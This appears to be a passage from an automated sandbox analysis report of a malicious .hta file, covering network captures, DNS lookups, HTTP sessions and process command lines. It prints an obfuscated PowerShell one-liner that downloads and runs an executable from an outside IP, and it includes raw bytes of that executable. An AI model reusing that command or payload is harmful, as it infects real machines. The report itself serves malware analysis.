                                                                                    Mar 13, 2025 01:19:03.145037889 CET44349696104.21.80.1192.168.2.6
                                                                                    Mar 13, 2025 01:19:03.145137072 CET49696443192.168.2.6104.21.80.1
                                                                                    Mar 13, 2025 01:19:03.154239893 CET49696443192.168.2.6104.21.80.1
                                                                                    Mar 13, 2025 01:19:03.154263973 CET44349696104.21.80.1192.168.2.6
                                                                                    Mar 13, 2025 01:19:03.185770988 CET4969580192.168.2.6158.101.44.242
                                                                                    Mar 13, 2025 01:19:03.191435099 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:19:05.372046947 CET44349696104.21.80.1192.168.2.6
                                                                                    Mar 13, 2025 01:19:05.372116089 CET49696443192.168.2.6104.21.80.1
                                                                                    Mar 13, 2025 01:19:05.381350040 CET49696443192.168.2.6104.21.80.1
                                                                                    Mar 13, 2025 01:19:05.381366968 CET44349696104.21.80.1192.168.2.6
                                                                                    Mar 13, 2025 01:19:05.381684065 CET44349696104.21.80.1192.168.2.6
                                                                                    Mar 13, 2025 01:19:05.435832024 CET49696443192.168.2.6104.21.80.1
                                                                                    Mar 13, 2025 01:19:05.590190887 CET49696443192.168.2.6104.21.80.1
                                                                                    Mar 13, 2025 01:19:05.636320114 CET44349696104.21.80.1192.168.2.6
                                                                                    Mar 13, 2025 01:19:05.986963034 CET44349696104.21.80.1192.168.2.6
                                                                                    Mar 13, 2025 01:19:05.987065077 CET44349696104.21.80.1192.168.2.6
                                                                                    Mar 13, 2025 01:19:05.987123013 CET49696443192.168.2.6104.21.80.1
                                                                                    Mar 13, 2025 01:19:05.994312048 CET49696443192.168.2.6104.21.80.1
                                                                                    Mar 13, 2025 01:20:08.139698982 CET8049695158.101.44.242192.168.2.6
                                                                                    Mar 13, 2025 01:20:08.139776945 CET4969580192.168.2.6158.101.44.242
                                                                                    Mar 13, 2025 01:20:43.139899015 CET4969580192.168.2.6158.101.44.242
                                                                                    Mar 13, 2025 01:20:43.144731998 CET8049695158.101.44.242192.168.2.6

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 13, 2025 01:19:02.315434933 CET5743353192.168.2.61.1.1.1
                                                                                    Mar 13, 2025 01:19:02.323494911 CET53574331.1.1.1192.168.2.6
                                                                                    Mar 13, 2025 01:19:03.133621931 CET6366453192.168.2.61.1.1.1
                                                                                    Mar 13, 2025 01:19:03.144227028 CET53636641.1.1.1192.168.2.6

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Mar 13, 2025 01:19:02.315434933 CET192.168.2.61.1.1.10x64bcStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:03.133621931 CET192.168.2.61.1.1.10x4b6bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Mar 13, 2025 01:19:02.323494911 CET1.1.1.1192.168.2.60x64bcNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:02.323494911 CET1.1.1.1192.168.2.60x64bcNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:02.323494911 CET1.1.1.1192.168.2.60x64bcNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:02.323494911 CET1.1.1.1192.168.2.60x64bcNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:02.323494911 CET1.1.1.1192.168.2.60x64bcNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:02.323494911 CET1.1.1.1192.168.2.60x64bcNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:03.144227028 CET1.1.1.1192.168.2.60x4b6bNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:03.144227028 CET1.1.1.1192.168.2.60x4b6bNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:03.144227028 CET1.1.1.1192.168.2.60x4b6bNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:03.144227028 CET1.1.1.1192.168.2.60x4b6bNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:03.144227028 CET1.1.1.1192.168.2.60x4b6bNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:03.144227028 CET1.1.1.1192.168.2.60x4b6bNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 01:19:03.144227028 CET1.1.1.1192.168.2.60x4b6bNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • reallyfreegeoip.org
                                                                                    • 23.95.235.28
                                                                                    • checkip.dyndns.org

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.64969423.95.235.28807452C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 13, 2025 01:18:54.650934935 CET283OUTGET /50/csso.exe HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: 23.95.235.28
                                                                                    Connection: Keep-Alive
                                                                                    Mar 13, 2025 01:18:55.125833035 CET1236INHTTP/1.1 200 OK
                                                                                    Date: Thu, 13 Mar 2025 00:18:54 GMT
                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                    Last-Modified: Wed, 12 Mar 2025 09:14:06 GMT
                                                                                    ETag: "eae00-63021a093dc5f"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 962048
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-msdownload
                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4f 50 d1 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 cc 05 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}PELOPg"}@ @@@@L|p%q+pH@.text `.rdata@@.datatR@.rsrc%p&@@.relocqr<@B
                                                                                    Mar 13, 2025 01:18:55.125849962 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: DALhYC,YY9hcCY8hiCYhnCYM,hsCYhxCYQh}CYSLQ
                                                                                    Mar 13, 2025 01:18:55.125858068 CET1236INData Raw: 00 7e 6a 8b 55 f4 8d 4b 14 8d 43 10 89 4d 08 89 45 0c 8b 38 0f b6 84 13 10 08 00 00 8b 09 89 4d e8 83 f8 10 0f 8f f4 a2 03 00 0f 84 cd a2 03 00 83 e8 08 74 5c 48 48 0f 84 86 a2 03 00 48 48 0f 84 37 a2 03 00 48 48 0f 84 cc a1 03 00 8b 7d f8 ff 45
                                                                                    Data Ascii: ~jUKCME8Mt\HHHH7HH}EEMUEM;S|[EMpWVE_^[]}}tWVE8t!EM9t9}ujWPVEUeSVW}3CEW](H
                                                                                    Mar 13, 2025 01:18:55.125926971 CET1236INData Raw: 3b c2 77 4c 0f 84 02 a0 03 00 83 f8 2b 0f 87 2b 01 00 00 0f 84 e7 9f 03 00 83 f8 06 0f 86 79 01 00 00 83 f8 0f 0f 84 a9 00 00 00 83 f8 07 0f 84 80 01 00 00 83 f8 20 0f 85 86 00 00 00 8b c7 c1 e8 10 50 0f b7 c7 50 53 56 e8 0f f9 ff ff eb 7d ba 02
                                                                                    Data Ascii: ;wL++y PPSV};w)7;vv83jWSV+KwIQI {Ih>WSPVH_^[]VX33J
                                                                                    Mar 13, 2025 01:18:55.125933886 CET1236INData Raw: 9d 03 00 83 be 9c 01 00 00 00 0f 85 18 9d 03 00 8d 45 cc 50 ff 33 ff 15 94 f6 48 00 8b 45 d4 8b 4d cc 2b c1 8b 55 d8 89 45 f4 8b 45 d0 2b d0 89 45 e8 8d 45 e4 50 ff 36 89 55 f0 89 4d e4 ff 15 70 f6 48 00 8b 7d e4 8b c7 0f af 45 f8 8b 75 e8 8b 4d
                                                                                    Data Ascii: EP3HEM+UEE+EEP6UMpH}EuM}fE}fEE}fEE}fft(Efu~E+;t'Ef`uE+
                                                                                    Mar 13, 2025 01:18:55.125941038 CET1236INData Raw: 8b 4d 08 8b ff 85 c0 74 1c 8b 10 39 0a 74 05 8b 40 04 eb f1 8b 4d 0c 01 4a 04 8b 00 8b 40 08 8b e5 5d c2 08 00 51 89 4d f4 c7 45 f8 01 00 00 00 ff 15 48 f1 48 00 89 45 fc b9 38 58 4c 00 8d 45 f4 50 e8 35 0f 00 00 8b 45 fc eb d3 55 8b ec 8b 4d 08
                                                                                    Data Ascii: Mt9t@MJ@]QMEHHE8XLEP5EUMtW}_]UQQSVW}EP7HElEpEPVpHME;tuc;xu[s5HsEE;|}t|;
                                                                                    Mar 13, 2025 01:18:55.125947952 CET1236INData Raw: 4c 00 e8 d2 0c 00 00 b9 0c 58 4c 00 e8 a9 0d 00 00 b9 f0 57 4c 00 e8 3a 31 00 00 a1 e0 57 4c 00 85 c0 0f 85 d3 98 03 00 5e c3 55 8b ec 83 ec 28 53 56 57 68 d0 01 00 00 e8 ca e5 01 00 59 85 c0 0f 84 41 02 00 00 8b c8 e8 2e e9 ff ff 8b f8 8b 0d 14
                                                                                    Data Ascii: LXLWL:1WL^U(SVWhYA.XL}M9WLEPXL}XL]8XLpuE @#E E@ZEE EE}
                                                                                    Mar 13, 2025 01:18:55.126197100 CET1236INData Raw: 84 2f 9c 03 00 48 48 0f 84 ae 9b 03 00 83 e8 05 0f 85 8f 9b 03 00 57 51 e8 a1 ee ff ff ff 37 ff 15 3c f6 48 00 8b 74 24 0c 83 7f 44 00 75 33 83 7f 64 00 75 38 83 7f 68 00 75 3d 83 7f 50 00 75 42 8b 44 24 14 3b 46 1c 74 44 50 8b cb e8 98 f7 ff ff
                                                                                    Data Ascii: /HHWQ7<Ht$Du3du8hu=PuBD$;FtDP3@_^[]3wDHwdHwh<HwP<HL$NUE(SV5XLW,~XLS]}
                                                                                    Mar 13, 2025 01:18:55.126204967 CET1236INData Raw: 00 85 c0 74 6a 8b c8 8b 40 08 a3 3c 58 4c 00 85 c9 74 0b 51 e8 3f 01 00 00 a1 3c 58 4c 00 85 c0 74 38 83 60 04 00 a1 3c 58 4c 00 8b 0d 40 58 4c 00 49 89 0d 40 58 4c 00 85 c9 75 b5 eb 9f a1 10 58 4c 00 8b 44 88 fc 8b 00 85 c0 74 16 ff 30 ff 15 3c
                                                                                    Data Ascii: tj@<XLtQ?<XLt8`<XL@XLI@XLuXLDt0<Hi%8XLqT@XLUQVW}3M97t>AdESt@A`t.W3$Ht3@[_^]3MF;ur3V~
                                                                                    Mar 13, 2025 01:18:55.126210928 CET1236INData Raw: 37 fe eb e3 32 c0 eb ed 55 8b ec 5d e9 2e 00 00 00 a1 c4 52 4c 00 85 c0 74 07 50 ff 15 3c f7 48 00 b9 f8 52 4c 00 e8 ae 22 00 00 b9 e8 52 4c 00 e8 a4 22 00 00 b9 d0 52 4c 00 e9 9a 22 00 00 55 8b ec 83 e4 f8 51 a1 ac 52 4c 00 53 56 8b 75 08 57 8b
                                                                                    Data Ascii: 72U].RLtP<HRL"RL"RL"UQRLSVuW};u^v_--HH--f;=$dL5uuWVH_^[]tHt#HvjVHXL.3jhj
                                                                                    Mar 13, 2025 01:18:55.130609989 CET1236INData Raw: 00 00 00 89 7d ec c7 45 f4 6c f9 48 00 89 4d f8 c7 45 d4 33 36 40 00 ff 15 24 f7 48 00 ff 35 c4 52 4c 00 66 a3 74 52 4c 00 ff 35 c0 52 4c 00 51 e8 0d f5 ff ff 5f 5e 8b e5 5d c3 55 8b ec b8 2c 00 02 00 e8 f9 dd 02 00 56 57 8d 4d d4 e8 16 3b 00 00
                                                                                    Data Ascii: }ElHME36@$H5RLftRL5RLQ_^]U,VWM;3EEEPh4HEPu0HRL3bLG;EPQhRLhRL6bLRLbLEEPPh5RL`H


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.649695158.101.44.242807656C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 13, 2025 01:19:02.374370098 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Mar 13, 2025 01:19:02.946003914 CET321INHTTP/1.1 200 OK
                                                                                    Date: Thu, 13 Mar 2025 00:19:02 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: a11cda3146118a8da845a952c9dec197
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                    Mar 13, 2025 01:19:02.952109098 CET127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Mar 13, 2025 01:19:03.131881952 CET321INHTTP/1.1 200 OK
                                                                                    Date: Thu, 13 Mar 2025 00:19:03 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: ba6bd08e7ce1c42e200f889d65170969
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.649696104.21.80.14437656C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-13 00:19:05 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2025-03-13 00:19:05 UTC865INHTTP/1.1 200 OK
                                                                                    Date: Thu, 13 Mar 2025 00:19:05 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 235058
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Mon, 10 Mar 2025 07:01:26 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Ym9wIXjwljOzXCQ6nZENklDWAtPwlPtrFvKQqwC7p4wwEANiyn%2BmSnSnCIPI%2BWwYc9wv8i1o%2FnTIrCHbybRQpTAoivoQGH%2BmIDgYoC7fupUnaQ%2Bk%2Fm3o%2Fov8JebSahOsKGvikME"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91f75b990eccd668-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=14252&min_rtt=13887&rtt_var=4460&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=181385&cwnd=198&unsent_bytes=0&cid=4d080f104c641fdf&ts=1092&x=0"
                                                                                    2025-03-13 00:19:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:20:18:50
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:mshta.exe "C:\Users\user\Desktop\uhg.hta"
                                                                                    Imagebase:0xc20000
                                                                                    File size:13'312 bytes
                                                                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:20:18:51
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                                                                                    Imagebase:0x2a0000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:20:18:51
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff68dae0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:20:18:51
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                                                                                    Imagebase:0x3b0000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:20:18:53
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"
                                                                                    Imagebase:0x30000
                                                                                    File size:2'141'552 bytes
                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:20:18:53
                                                                                    Start date:12/03/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP"
                                                                                    Imagebase:0x420000
                                                                                    File size:46'832 bytes
                                                                                    MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
